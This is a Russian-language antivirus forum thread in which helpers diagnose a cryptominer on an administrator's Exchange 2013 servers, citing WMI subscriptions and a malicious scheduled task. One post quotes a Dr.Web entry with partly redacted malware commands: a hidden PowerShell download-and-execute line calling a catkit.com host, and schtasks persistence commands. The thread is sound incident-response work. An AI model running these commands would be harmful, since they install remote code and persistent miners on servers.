Вход
Уважаемые пользователи!

Поставщик ИТ-решений PRO32 сообщает вам, что после 17 лет сотрудничества мы более не являемся эксклюзивным дистрибьютором программных продуктов словацкого разработчика ESET в России, Республике Беларусь, Казахстане, Азербайджане, Узбекистане, Кыргызстане, Таджикистане, Туркменистане, Молдове, Грузии и Армении.

Купить и продлить лицензии ESET на нашем сайте больше нельзя.

Предлагаем вам попробовать новый антивирус от компании PRO32.

Продукты PRO32 — это технологичные решения, надежная защита от киберугроз и максимальная производительность устройств на Windows / Android.

Для действующих клиентов ESET мы предлагаем промокод на скидку в размере 15% — ESET15. Скопируйте его и после добавления товара в корзину, не забудьте его применить в корзине.

Перейти на PRO32
Поиск  Пользователи  Правила  Войти
Центр вирусных исследований и аналитики Обнаружение вредоносного кода и ложные срабатывания

[ Закрыто ] запуск майнера на серверах с MS Exchange 2013

1 2 3 4 5 След.
RSS
 
Владимир Шариков
Владимир Шариков
Пользователь
Сообщений: 148
Баллов: 118
Регистрация: 25.03.2011
Размещено 26.07.2021 09:55:41
Здравствуйте.
Собственно снова вирусы на двух MS Exchange 2013. В скриншоте показал строку c бякой.
Файл WACS.EXE нормальный, используется для сертификатов ssl.
Помогите отыскать заразу.
 
santy
santy
Администратор
Сообщений: 17962
Баллов: 14369
Регистрация: 16.03.2010
Размещено 26.07.2021 16:04:50
процесс rundll32.exe (с внедренным майнером) закрыли перед созданием  образа автозапуска?
может переделаете образ автозапуска с активным процессом, чтобы можно было увидеть какой процесс ему внедряет майнера?

пока что видно несколько заданий, запускаемых из WMI:
WMI:\\.\ROOT\SUBSCRIPTION\.[F5BR1LMHB]
WMI:\\.\ROOT\SUBSCRIPTION\.[FKB6RDNGR]
WMI:\\.\ROOT\SUBSCRIPTION\.[FOQ6EDPWMK]
WMI:\\.\ROOT\SUBSCRIPTION\.[FUTWMFBRLE4]

+
по второму серверу сделайте образ автозапуска, чтобы было с чем сравнить
[ Как создать образ автозапуска? ]
 
Владимир Шариков
Владимир Шариков
Пользователь
Сообщений: 148
Баллов: 118
Регистрация: 25.03.2011
Размещено 27.07.2021 09:25:49
Эх!!! Только закрыл процесс на двух серверах, т.к. люди работать не могут, после прочитал... Запускается в 2:30 каждый день, как самостоятельно его запустить не знаю, завтра утром сделаю. Можно время перевести вперед попытаться, но боюсь что на экчандже проблемы будут.
 
RP55 RP55
RP55 RP55
Пользователь
Сообщений: 6234
Баллов: 4987
Регистрация: 25.05.2010
Размещено 27.07.2021 15:16:49
Цитата
Владимир Шариков написал:
Запускается в 2:30 каждый день

В Задачах:

Полное имя                  T.NETCATKIT.COM
Имя файла                   T.NETCATKIT.COM
Тек. статус                 в автозапуске
                           
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                           
Ссылки на объект            
Ссылка                      C:\WINDOWS\SYSTEM32\TASKS\T.NETCATKIT.COM
                           
https://www.virustotal.com/gui/url/1d48c0de95f50662b0a356670209877bf3938263f8921484­58963b4f09b82ad2/detection
 
santy
santy
Администратор
Сообщений: 17962
Баллов: 14369
Регистрация: 16.03.2010
Размещено 27.07.2021 16:48:33
да, T.NETCATKIT.COM тоже может быть частью заданий злоумышленников
[ Как создать образ автозапуска? ]
 
santy
santy
Администратор
Сообщений: 17962
Баллов: 14369
Регистрация: 16.03.2010
Размещено 27.07.2021 16:52:29
Цитата
Владимир Шариков написал:
Можно время перевести вперед попытаться, но боюсь что на экчандже проблемы будут.
не нужно,
как процесс запустится, сделайте образы автозапуска, потом процессы можно закрыть, вечером посмотрим образы, и напишем скрипты очистки
[ Как создать образ автозапуска? ]
 
RP55 RP55
RP55 RP55
Пользователь
Сообщений: 6234
Баллов: 4987
Регистрация: 25.05.2010
Размещено 27.07.2021 17:34:34
drweb.ru


Цитата
Trojan.DownLoader38.26327

Добавлен в вирусную базу Dr.Web: 2021-04-08

Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы

   <SYSTEM32>\tasks\t.netcatkit.com
   <SYSTEM32>\tasks\xr6ziynzn

Вредоносные функции
Загружает

   http://+t.###+catkit.com/a.jsp?re################################ as %username%

Сетевая активность
UDP

   DNS ASK t.###catkit.com

Другое
Создает и запускает на исполнение

   '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -c (New-Object Net.WebClient).DownloadString('http://'+##.##t'+'catkit.com/a.jsp?re############################################################## Win32_ComputerSystemProduct).UUID,(random))-joi...' (со скрытым окном)

Запускает на исполнение

   '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 120 /tn t.netcatkit.com /F /tr t.netcatkit.com
   '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 60 /tn \xr6zIYnZN /F /tr "powershell -c PS_CMD"
   '<SYSTEM32>\schtasks.exe' /run /tn \xr6zIYnZN
 
RP55 RP55
RP55 RP55
Пользователь
Сообщений: 6234
Баллов: 4987
Регистрация: 25.05.2010
Размещено 27.07.2021 17:39:13
+
https://blog.talosintelligence.com/2021/05/lemon-duck-spreads-wings.html
 
santy
santy
Администратор
Сообщений: 17962
Баллов: 14369
Регистрация: 16.03.2010
Размещено 27.07.2021 17:43:53
да, это было в предыдущей атаке Proxylogon на эти же сервера,
но здесь еще есть новые задания WMI, потому лучше полный образ получить с нагруженным процессом rundll32.exe
и второй образ проверить, что в нем есть
[ Как создать образ автозапуска? ]
 
Владимир Шариков
Владимир Шариков
Пользователь
Сообщений: 148
Баллов: 118
Регистрация: 25.03.2011
Размещено 28.07.2021 09:56:47
В общем самодеятельность моего начальника привела к тому что, он самостоятельно, без моего ведома, запустил Малвербайт на этих серверах.
Правда это дало результат, сегодня всё в нормальном состоянии... Скинул на всякий случай отчет из него. Но зараза возможно что снова прилетит?  
 
1 2 3 4 5 След.
Читают тему